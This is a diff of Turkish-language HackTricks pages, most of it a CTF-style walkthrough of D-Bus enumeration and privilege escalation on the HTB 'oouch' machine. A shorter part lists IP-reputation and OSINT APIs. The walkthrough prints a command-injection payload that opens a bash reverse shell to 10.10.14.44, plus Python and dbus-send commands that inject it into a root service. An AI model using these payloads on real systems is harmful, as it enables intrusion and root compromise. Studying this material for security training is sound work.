D-Bus, Ubuntu masaüstü ortamlarında ara işlem iletişim (IPC) arabirimi olarak kullanılır. Ubuntu'da, birkaç mesaj otobüsünün eşzamanlı çalışması gözlemlenir: sistem otobüsü, **sistem genelinde ilgili hizmetleri sunmak için ayrıcalıklı hizmetler tarafından kullanılan** ve her oturum açmış kullanıcı için bir oturum otobüsü, yalnızca o belirli kullanıcıyla ilgili hizmetleri sunan. Buradaki odak noktası, ayrıcalıklarını yükseltmek amacıyla daha yüksek ayrıcalıklarda (örneğin, root) çalışan hizmetlerle ilişkili olan sistem otobüsüdür. D-Bus'ın mimarisi, her oturum otobüsü için bir 'yönlendirici' kullanır ve bu yönlendirici, istemcilerin iletişim kurmak istedikleri hizmete göre istemci mesajlarını uygun hizmetlere yönlendirmekten sorumludur.
D-Bus, Ubuntu masaüstü ortamlarında ara işlem iletişimleri (IPC) arabirimi olarak kullanılır. Ubuntu'da, birkaç mesaj otobanının eşzamanlı çalıştığı gözlemlenir: sistem otobanı, genellikle **sistem genelinde ilgili hizmetleri sunmak için ayrıcalıklı hizmetler tarafından kullanılan** ve her oturum açılan kullanıcı için bir oturum otobanı, yalnızca o belirli kullanıcı için ilgili hizmetleri sunan. Buradaki odak noktası, ayrıcalıklı hizmetlerin çalıştığı daha yüksek ayrıcalıklarla (örneğin, kök) ilişkilendirilen sistem otobanıdır çünkü amacımız ayrıcalıkları yükseltmektir. D-Bus'ın mimarisinin her oturum otobanı için bir 'yönlendirici' kullandığı, bu yönlendiricinin, istemcilerin iletişim kurmak istedikleri hizmetlere göre istemci mesajlarını yönlendirmekten sorumlu olduğu belirtilmiştir.
D-Bus üzerindeki hizmetler, sundukları **nesneler** ve **arayüzler** tarafından tanımlanır. Nesneler, standart OOP dillerindeki sınıf örneklerine benzetilebilir ve her örnek, bir **nesne yolu** tarafından benzersiz bir şekilde tanımlanır. Bu yol, bir dosya sistemi yoluna benzer şekilde, hizmet tarafından sunulan her nesneyi benzersiz bir şekilde tanımlar. Araştırma amaçları için önemli bir arayüz, nesnenin desteklediği yöntemlerin, sinyallerin ve özelliklerin XML temsili olan **org.freedesktop.DBus.Introspectable** arayüzüdür. Bu yöntem, özellikler ve sinyalleri atlayarak, burada yöntemlere odaklanır.
D-Bus'taki hizmetler, sundukları **nesneler** ve **arayüzler** tarafından tanımlanır. Nesneler, her biri benzersiz bir **nesne yolunu** tanımlayan standart OOP dillerindeki sınıf örneklerine benzetilebilir. Bu yol, bir dosya sistemi yoluna benzer şekilde, hizmet tarafından sunulan her nesneyi benzersiz bir şekilde tanımlar. Araştırma amaçları için önemli bir arayüz, yalnızca bir yöntem olan Introspect yöntemine sahip olan **org.freedesktop.DBus.Introspectable** arayüzüdür. Bu yöntem, nesnenin desteklediği yöntemlerin, sinyallerin ve özelliklerin XML temsilini döndürür, burada özellikleri ve sinyalleri atlayarak yöntemlere odaklanır.
D-Bus arabirimine iletişim için iki araç kullanıldı: D-Bus tarafından sunulan yöntemleri kolayca çağırmak için bir CLI aracı olan **gdbus** ve her otobüste mevcut olan hizmetleri numaralandırmak ve her hizmetin içerdiği nesneleri görüntülemek için tasarlanmış Python tabanlı bir GUI aracı olan [**D-Feet**](https://wiki.gnome.org/Apps/DFeet).
D-Bus arabirimine iletişim için iki araç kullanıldı: D-Bus tarafından sunulan yöntemleri betiklerde kolayca çağırmak için **gdbus** adlı bir CLI aracı ve [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), her otobanda mevcut hizmetleri numaralandırmak ve her hizmetin içinde bulunan nesneleri görüntülemek için tasarlanmış Python tabanlı bir GUI aracı.
```bash
sudo apt-get install d-feet
```
@ -28,21 +29,22 @@ sudo apt-get install d-feet
![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png)
İlk resimde D-Bus sistem otobüsüne kaydedilen servisler gösterilmektedir ve özellikle Sistem Otobüsü düğmesi seçildikten sonra **org.debin.apt** vurgulanmaktadır. D-Feet bu servisi nesneler için sorgular ve seçilen nesneler için arabirimleri, yöntemleri, özellikleri ve sinyalleri görüntüler, ikinci resimde görüldüğü gibi. Her yöntemin imzası da detaylı olarak gösterilir.
Dikkate değer bir özellik, servisin **işlem kimliği (pid)** ve **komut satırı**nın görüntülenmesidir, bu da servisin yükseltilmiş ayrıcalıklarla çalışıp çalışmadığını doğrulamak için kullanışlıdır ve araştırma açısından önemlidir.
İlk resimde D-Bus sistem otobüsüne kaydedilen servisler gösterilmekte, özellikle Sistem Otobüsü düğmesi seçildikten sonra **org.debin.apt** vurgulanmaktadır. D-Feet bu servisi nesneler için sorgular ve seçilen nesneler için arayüzleri, yöntemleri, özellikleri ve sinyalleri görüntüler, ikinci resimde görüldüğü gibi. Her yöntemin imzası da detaylı olarak verilir.
**D-Feet ayrıca yöntem çağrısına izin verir**: kullanıcılar parametre olarak Python ifadelerini girebilir ve D-Feet bu ifadeleri D-Bus türlerine dönüştürerek servise iletilir.
Dikkate değer bir özellik, servisin **işlem kimliği (pid)** ve **komut satırının** görüntülenmesidir; bu, servisin yükseltilmiş ayrıcalıklarla çalışıp çalışmadığını doğrulamak için faydalıdır ve araştırma açısından önemlidir.
Ancak, **bazı yöntemlerin çağrılabilmesi için kimlik doğrulaması gerekmektedir**. İlk etapta kimlik bilgileri olmadan ayrıcalıkları yükseltmek amacımız olduğu için bu yöntemleri göz ardı edeceğiz.
**D-Feet ayrıca yöntem çağrısına izin verir**: kullanıcılar parametre olarak Python ifadeleri girebilir, D-Feet bu ifadeleri D-Bus türlerine dönüştürerek servise iletmektedir.
Ayrıca, bazı servisler belirli eylemleri gerçekleştirmeye izin verilip verilmeyeceğini belirlemek için başka bir D-Bus servisi olan org.freedeskto.PolicyKit1'i sorgular.
Ancak, **bazı yöntemlerin çağrılabilmesi için kimlik doğrulaması gerekebilir**. Bu yöntemleri göz ardı edeceğiz, çünkü amacımız öncelikle kimlik bilgileri olmadan ayrıcalıklarımızı yükseltmektir.
Ayrıca, bazı servislerin belirli eylemleri gerçekleştirmeye izin verilip verilmeyeceğini belirlemek için başka bir D-Bus servisi olan org.freedeskto.PolicyKit1'i sorguladığını unutmayın.
## **Komut Satırı Sıralaması**
### Servis Nesnelerini Listeleme
ık D-Bus arabirimlerini listelemek mümkündür:
ık D-Bus arayüzlerini listelemek mümkündür:
```bash
busctl list #List D-Bus interfaces
@ -68,11 +70,11 @@ org.freedesktop.locale1 - - - (act
```
#### Bağlantılar
[Wikipedia'dan:](https://en.wikipedia.org/wiki/D-Bus) Bir işlem bir otobüse bağlantı kurduğunda, otobüs bağlantıya _benzersiz bağlantı adı_ adı verilen özel bir otobüs adı atar. Bu tür otobüs adları değişmezdir - bağlantı var olduğu sürece değişmeyeceği garanti edilir - ve daha da önemlisi, otobüs ömrü boyunca yeniden kullanılamazlar. Bu, aynı işlem otobüs bağlantısını kapatıp yeni bir bağlantı oluştursa bile, başka bir bağlantının bu tür benzersiz bağlantı adı atanmayacağı anlamına gelir. Benzersiz bağlantı adları kolayca tanınır çünkü—aksi takdirde yasak olan—iki nokta karakteriyle başlar.
[From wikipedia:](https://en.wikipedia.org/wiki/D-Bus) Bir işlem bir otobüse bağlantı kurduğunda, otobüs bağlantıya _benzersiz bağlantı adı_ adı verilen özel bir otobüs adı atar. Bu tür otobüs adları değişmezdir - bağlantı var olduğu sürece değişmeyeceği garanti edilir - ve daha da önemlisi, otobüs ömrü boyunca tekrar kullanılamazlar. Bu, aynı işlem otobüs bağlantısını kapatıp yeni bir tane oluştursa bile, başka bir bağlantının bu tür benzersiz bağlantı adını asla atamayacağı anlamına gelir. Benzersiz bağlantı adları kolayca tanınabilir çünkü—aksi takdirde yasak olan—iki nokta karakteri ile başlar.
### Servis Nesne Bilgisi
Ardından, arayüz hakkında bazı bilgiler alabilirsiniz:
Daha sonra, arayüz hakkında bazı bilgiler alabilirsiniz:
```bash
busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface
@ -132,7 +134,7 @@ cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
```
### Bir Hizmet Nesnesinin Arayüzlerini Listeleme
### Bir Hizmet Nesnesinin Arayüzlerini Listele
Yeterli izinlere sahip olmanız gerekmektedir.
```bash
@ -142,9 +144,9 @@ busctl tree htb.oouch.Block #Get Interfaces of the service object
└─/htb/oouch
└─/htb/oouch/Block
```
### Bir Hizmet Nesnesinin Introspect Arayüzü
### Bir Hizmet Nesnesinin Arayüzünü İnceleyin
Bu örnekte, `tree` parametresi kullanılarak en son keşfedilen arayüzün seçildiğine dikkat edin (_önceki bölüme bakınız_):
Bu örnekte, `tree` parametresini kullanarak keşfedilen en son arayüzün nasıl seçildiğine dikkat edin (_önceki bölüme bakınız_):
```bash
busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface
@ -164,21 +166,23 @@ org.freedesktop.DBus.Properties interface - - -
```
### İzleme/Yakalama Arayüzü
Yeterli ayrıcalıklara sahipseniz (`send_destination` ve `receive_sender` ayrıcalıkları yeterli değildir), bir D-Bus iletişimini **izleyebilirsiniz**.
Yeterli ayrıcalıklarla (sadece `send_destination` ve `receive_sender` ayrıcalıkları yeterli değil) bir **D-Bus iletişimini izleyebilirsiniz**.
Bir iletişimi **izlemek** için **root** olmanız gerekmektedir. Hala root olma konusunda sorun yaşıyorsanız [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) ve [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) adreslerine bakabilirsiniz.
Bir **iletişimi izlemek** için **root** olmanız gerekecektir. Hala root olmakta sorun yaşıyorsanız [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) ve [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) adreslerine bakabilirsiniz.
{% hint style="warning" %}
Bir D-Bus yapılandırma dosyasını **root olmayan kullanıcıların iletişimi dinlemesine izin verecek şekilde yapılandırmayı** biliyorsanız, lütfen **benimle iletişime geçin**!
Bir D-Bus yapılandırma dosyasını **kök olmayan kullanıcıların iletişimi izlemesine izin verecek şekilde yapılandırmayı** biliyorsanız lütfen **benimle iletişime geçin**!
{% endhint %}
İzlemek için farklı yöntemler:
İzlemek için farklı yollar:
```bash
sudo busctl monitor htb.oouch.Block #Monitor only specified
sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see
sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see
```
Aşağıdaki örnekte `htb.oouch.Block` arayüzü izlenir ve **yanlış iletişim yoluyla "**_**lalalalal**_**" mesajı gönderilir**:
```html
<p>İlgili örnekte `htb.oouch.Block` arayüzü izlenir ve **"**_**lalalalal**_**" mesajı yanlış iletişim yoluyla gönderilir:</p>
```
```bash
busctl monitor htb.oouch.Block
@ -197,15 +201,13 @@ MESSAGE "s" {
STRING "Carried out :D";
};
```
Sonuçları bir pcap dosyasında kaydetmek için `monitor` yerine `capture` kullanabilirsiniz.
#### Tüm gürültüyü filtreleme <a href="#filtering_all_the_noise" id="filtering_all_the_noise"></a>
Eğer otobüste çok fazla bilgi varsa, aşağıdaki gibi bir eşleşme kuralı geçin:
Eğer otobüste çok fazla bilgi varsa, aşağıdaki gibi bir eşleşme kuralı geçirin:
```bash
dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'"
```
Birden çok kural belirtilebilir. Bir ileti, kurallardan _herhangi birini_ karşılarsa, ileti yazdırılır. Aşağıdaki gibi:
Birden fazla kural belirtilebilir. Bir ileti, kuralların _herhangi birini_ karşılarsa ileti yazdırılacaktır. Örneğin:
```bash
dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
```
@ -217,11 +219,11 @@ Daha fazla bilgi için [D-Bus belgelerine](http://dbus.freedesktop.org/doc/dbus-
### Daha Fazla
`busctl` daha fazla seçeneğe sahiptir, [**hepsini burada bulabilirsiniz**](https://www.freedesktop.org/software/systemd/man/busctl.html).
`busctl`'nin daha fazla seçeneği var, [**hepsini burada bulabilirsiniz**](https://www.freedesktop.org/software/systemd/man/busctl.html).
## **Zayıf Senaryo**
HTB'deki "oouch" ana bilgisayarı içindeki **qtc kullanıcısı olarak**, _/etc/dbus-1/system.d/htb.oouch.Block.conf_ konumunda **beklenmeyen bir D-Bus yapılandırma dosyası** bulabilirsiniz:
**HTB'den "oouch" ana bilgisayarındaki qtc kullanıcısı olarak**, _/etc/dbus-1/system.d/htb.oouch.Block.conf_ konumunda **beklenmeyen bir D-Bus yapılandırma dosyası** bulabilirsiniz:
```xml
<?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->
@ -242,7 +244,7 @@ HTB'deki "oouch" ana bilgisayarı içindeki **qtc kullanıcısı olarak**, _/etc
</busconfig>
```
Önceki yapılandırmadan not edin ki, bu D-BUS iletişimi aracılığıyla bilgi göndermek ve almak için **`root` veya `www-data` kullanıcısı olmanız gerekecektir**.
Önceki yapılandırmadan **bu D-BUS iletişimi aracılığıyla bilgi gönderip almak için `root` veya `www-data` kullanıcısı olmanız gerekeceğini** unutmayın.
Docker konteyneri **aeb4525789d8** içindeki **qtc** kullanıcısı olarak, _/code/oouch/routes.py_ dosyasında bazı dbus ile ilgili kodları bulabilirsiniz. İlgili kodlar şunlardır:
```python
@ -256,14 +258,14 @@ response = block_iface.Block(client_ip)
bus.close()
return render_template('hacker.html', title='Hacker')
```
Gördüğünüz gibi, bir D-Bus arabirimine bağlanıyor ve "Block" işlevine "client_ip" bilgisini gönderiyor.
Gördüğünüz gibi, **bir D-Bus arayüzüne bağlanıyor** ve "Block" fonksiyonuna "client\_ip" bilgisini gönderiyor.
D-Bus bağlantısının diğer tarafında çalışan derlenmiş bir C kodu bulunmaktadır. Bu kod, D-Bus bağlantısında IP adresini dinlemekte ve `system` işlevi aracılığıyla iptables'i çağırmaktadır.\
`system` işlevine yapılan çağrı, komut enjeksiyonuna karşı kasten savunmasızdır, bu nedenle aşağıdaki gibi bir payload ters kabuk oluşturacaktır: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
D-Bus bağlantısının diğer tarafında çalışan derlenmiş bir C binary bulunmaktadır. Bu kod, D-Bus bağlantısında **IP adresini dinliyor ve `system` fonksiyonu aracılığıyla iptables'ı çağırıyor** verilen IP adresini engellemek için.\
**`system` fonksiyonuna yapılan çağrı, bilerek komut enjeksiyonuna açıktır**, bu nedenle aşağıdaki gibi bir yükleme ters kabuk oluşturacaktır: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
### Sömürün
### Sızma
Bu sayfanın sonunda, D-Bus uygulamasının tam C kodunu bulabilirsiniz. İçinde, 91-97 satırları arasında `D-Bus nesne yolu` ve `arayüz adının` nasıl kaydedildiğini bulabilirsiniz. Bu bilgi, D-Bus bağlantısına bilgi göndermek için gereklidir:
Bu sayfanın sonunda **D-Bus uygulamasının tam C kodunu** bulabilirsiniz. İçinde, 91-97 satırları arasında **`D-Bus nesne yolu`** ve **`arayüz adı`** nasıl **kaydedildiğini** bulabilirsiniz. Bu bilgiler, D-Bus bağlantısına bilgi göndermek için gereklidir:
```c
/* Install the object */
r = sd_bus_add_object_vtable(bus,
@ -273,13 +275,13 @@ r = sd_bus_add_object_vtable(bus,
block_vtable,
NULL);
```
Ayrıca, 57. satırda **bu D-Bus iletişimi için kaydedilmiş tek yöntemin** `Block` adında olduğunu görebilirsiniz (_**Bu nedenle, aşağıdaki bölümde yükler hizmet nesnesine `htb.oouch.Block`, arayüze `/htb/oouch/Block` ve yöntem adına `Block` gönderilecektir**_):
Ayrıca, 57. satırda **bu D-Bus iletişimi için kayıtlı olan tek yöntemin** `Block` adında olduğunu bulabilirsiniz (_**Bu nedenle, aşağıdaki bölümde yükler hizmet nesnesine `htb.oouch.Block`, arayüze `/htb/oouch/Block` ve yöntem adına `Block` gönderilecektir**_):
```c
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
```
#### Python
Aşağıdaki python kodu, payload'ı `Block` yöntemine D-Bus bağlantısı üzerinden gönderecektir (`block_iface.Block(runme)` not edin ki bu, önceki kod parçasından çıkarılmıştır):
Aşağıdaki python kodu, `Block` yöntemine `block_iface.Block(runme)` üzerinden D-Bus bağlantısına yük gönderecektir (_not: bu kod parçası önceki kod parçasından çıkarılmıştır_):
```python
import dbus
bus = dbus.SystemBus()
@ -290,35 +292,17 @@ response = block_iface.Block(runme)
bus.close()
```
#### busctl ve dbus-send
`busctl` and `dbus-send` are command-line tools used for interacting with the D-Bus system. D-Bus is a message bus system that allows communication between different processes on a Linux system.
`busctl` is used to introspect and control the D-Bus bus. It provides information about available services, objects, and interfaces on the bus. With `busctl`, you can also send method calls and signals to D-Bus services.
`dbus-send` is a utility for sending messages to a D-Bus message bus. It can be used to invoke methods on D-Bus objects and send signals. `dbus-send` is particularly useful for testing and debugging D-Bus services.
Both `busctl` and `dbus-send` can be used for privilege escalation in certain scenarios. By exploiting vulnerabilities in D-Bus services or misconfigurations, an attacker can execute arbitrary commands with elevated privileges.
#### busctl ve dbus-send
`busctl` ve `dbus-send`, D-Bus sistemiyle etkileşimde kullanılan komut satırı araçlarıdır. D-Bus, bir Linux sisteminde farklı süreçler arasında iletişim sağlayan bir mesaj otobüsü sistemidir.
`busctl`, D-Bus otobüsünü incelemek ve kontrol etmek için kullanılır. Otobüsteki mevcut hizmetler, nesneler ve arabirimler hakkında bilgi sağlar. `busctl` ile D-Bus hizmetlerine yöntem çağrıları ve sinyaller gönderebilirsiniz.
`dbus-send`, bir D-Bus mesaj otobüsüne mesaj göndermek için kullanılan bir yardımcı programdır. D-Bus nesnelerinde yöntem çağırmak ve sinyaller göndermek için kullanılabilir. `dbus-send`, özellikle D-Bus hizmetlerini test etmek ve hata ayıklamak için kullanışlıdır.
`busctl` ve `dbus-send`, belirli senaryolarda ayrıcalık yükseltme için kullanılabilir. D-Bus hizmetlerindeki güvenlik açıklarını veya yanlış yapılandırmaları sömürerek, saldırganlar yükseltilmiş ayrıcalıklarla keyfi komutlar yürütebilirler.
```bash
dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'
```
* `dbus-send`, "Message Bus" adlı bir yazılıma mesaj göndermek için kullanılan bir araçtır.
* Message Bus, sistemler arasında iletişimi kolaylaştırmak için kullanılan bir yazılımdır. Mesaj Sırası (mesajlar sırayla düzenlenir) ile ilgilidir, ancak Message Bus'ta mesajlar abonelik modelinde gönderilir ve çok hızlıdır.
* "-system" etiketi, varsayılan olarak bir oturum mesajı olmayan bir sistem mesajını belirtmek için kullanılır.
* "-print-reply" etiketi, mesajımızı uygun şekilde yazdırmak ve insan tarafından okunabilir bir formatta herhangi bir yanıt almak için kullanılır.
* "-dest=Dbus-Interface-Block", Dbus arayüzünün adresidir.
* "-string:", arayüze göndermek istediğimiz mesajın türüdür. Mesaj gönderme formatlarının çeşitli biçimleri vardır, örneğin double, bytes, booleans, int, objpath. Bunların dışında, "object path" bir dosyanın yolunu Dbus arayüzüne göndermek istediğimizde kullanışlıdır. Bu durumda bir komutu dosya adı olarak arayüze iletmek için özel bir dosya (FIFO) kullanabiliriz. "string:;": Bu, FIFO ters kabuk dosya/komutunun yerini tekrar çağırmak için nesne yolunu çağırmak içindir.
* `dbus-send`, "Message Bus"e mesaj göndermek için kullanılan bir araçtır.
* Message Bus - Sistemler arasında iletişimi kolaylaştırmak için kullanılan bir yazılımdır. Mesaj Kuyruğu ile ilgilidir (mesajlar sırayla düzenlenir), ancak Message Bus'ta mesajlar bir abonelik modelinde gönderilir ve ayrıca çok hızlıdır.
* "-system" etiketi, varsayılan olarak bir oturum mesajı değil bir sistem mesajı olduğunu belirtmek için kullanılır.
* "--print-reply" etiketi, mesajımızı uygun şekilde yazdırmak ve insan tarafından okunabilir bir formatta yanıtları almak için kullanılır.
* "--dest=Dbus-Interface-Block" Dbus arayüzünün adresi.
* "--string:" - Arayüze göndermek istediğimiz mesajın türü. Mesaj gönderme formatlarının çeşitli olduğu gibi double, bytes, booleans, int, objpath gibi mesaj gönderme formatları vardır. Bunların dışında, "object path" dosya yolunu Dbus arayüzüne göndermek istediğimizde kullanışlıdır. Bu durumda bir komutu dosya adı olarak arayüze iletmek için özel bir dosya (FIFO) kullanabiliriz. "string:;" - Bu, FIFO ters kabuk dosya/komutunun adını dosya olarak yerleştirdiğimiz yerde tekrar nesne yolunu çağırmak içindir.
_Not olarak, `htb.oouch.Block.Block` içindeki ilk bölüm (`htb.oouch.Block`), hizmet nesnesine referans yaparken, son bölüm (`.Block`), yöntem adına referans yapar._
_Not: `htb.oouch.Block.Block` içinde, ilk kısım (`htb.oouch.Block`) servis nesnesine referans verir ve son kısım (`.Block`) yöntem adını belirtir._
### C kodu
@ -468,16 +452,17 @@ return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
## Referanslar
* [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,96 +1,97 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz**, [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya **bizi** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip et.**
* **Hacking püf noktalarını paylaşmak için PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# [ProjectHoneypot](https://www.projecthoneypot.org/)
Bir IP'nin şüpheli/zararlı faaliyetlerle ilişkili olup olmadığını sorabilirsiniz. Tamamen ücretsiz.
Bir IP'nin şüpheli/tehlikeli faaliyetlerle ilişkili olup olmadığını sorabilirsiniz. Tamamen ücretsiz.
# [**BotScout**](http://botscout.com/api.htm)
IP adresinin hesap kaydeden bir botla ilişkili olup olmadığını kontrol eder. Ayrıca kullanıcı adlarını ve e-postaları kontrol edebilir. Başlangıçta ücretsiz.
IP adresinin hesap kaydeden bir botla ilişkili olup olmadığını kontrol edin. Ayrıca kullanıcı adlarını ve e-postaları kontrol edebilir. Başlangıçta ücretsiz.
# [Hunter](https://hunter.io/)
E-postaları bulup doğrulayın.
Bazı ücretsiz API istekleri mevcut, daha fazlası için ödeme yapmanız gerekiyor.
Ticari mi?
E-postaları bulun ve doğrulayın.
Bazı ücretsiz API istekleri ücretsiz, daha fazlası için ödeme yapmanız gerekmektedir.
Ticari?
# [AlientVault](https://otx.alienvault.com/api)
IP'ler ve Alan Adları ile İlişkili Zararlı Faaliyetleri Bulun. Ücretsiz.
IP'ler ve Alanlarla İlişkili Kötü Amaçlı Faaliyetleri Bulun. Ücretsiz.
# [Clearbit](https://dashboard.clearbit.com/)
Bir e-postaya ilişkin kişisel verileri bulun \(diğer platformlardaki profiller\), alan adı \(temel şirket bilgileri, e-postalar ve çalışanlar\) ve şirketler \(e-postadan şirket bilgilerini alın\).
Tüm olanaklara erişmek için ödeme yapmanız gerekiyor.
Ticari mi?
E-posta \(diğer platformlardaki profiller\), alan \(temel şirket bilgileri, e-postalar ve çalışanlar\) ve şirketler \(e-postadan şirket bilgilerini alın\) ile ilgili kişisel verileri bulun.
Tüm olasılıklara erişmek için ödeme yapmanız gerekmektedir.
Ticari?
# [BuiltWith](https://builtwith.com/)
Web sitelerinde kullanılan teknolojiler. Pahalı...
Ticari mi?
Ticari?
# [Fraudguard](https://fraudguard.io/)
Bir ana bilgisayarın \(alan adı veya IP\) şüpheli/zararlı faaliyetlerle ilişkili olup olmadığını kontrol edin. Bazı ücretsiz API erişimi mevcut.
Ticari mi?
Bir ana bilgisayarın \(alan veya IP\) şüpheli/tehlikeli faaliyetlerle ilişkili olup olmadığını kontrol edin. Bazı ücretsiz API erişimi vardır.
Ticari?
# [FortiGuard](https://fortiguard.com/)
Bir ana bilgisayarın \(alan adı veya IP\) şüpheli/zararlı faaliyetlerle ilişkili olup olmadığını kontrol edin. Bazı ücretsiz API erişimi mevcut.
Bir ana bilgisayarın \(alan veya IP\) şüpheli/tehlikeli faaliyetlerle ilişkili olup olmadığını kontrol edin. Bazı ücretsiz API erişimi vardır.
# [SpamCop](https://www.spamcop.net/)
Ana bilgisayarın spam faaliyetiyle ilişkili olup olmadığını belirtir. Bazı ücretsiz API erişimi mevcut.
Ana bilgisayarın spam faaliyetleri ile ilişkili olup olmadığını belirtir. Bazı ücretsiz API erişimi vardır.
# [mywot](https://www.mywot.com/)
Görüşlere ve diğer metriklere dayanarak bir alan adının şüpheli/zararlı bilgilerle ilişkili olup olmadığını belirleyin.
Görüşlere ve diğer metriklere dayanarak bir alanın şüpheli/tehlikeli bilgilerle ilişkili olup olmadığını öğrenin.
# [ipinfo](https://ipinfo.io/)
Bir IP adresinden temel bilgileri alın. Aylık olarak 100K'ya kadar test yapabilirsiniz.
Bir IP adresinden temel bilgiler alın. Aylık 100K'ya kadar test yapabilirsiniz.
# [securitytrails](https://securitytrails.com/app/account)
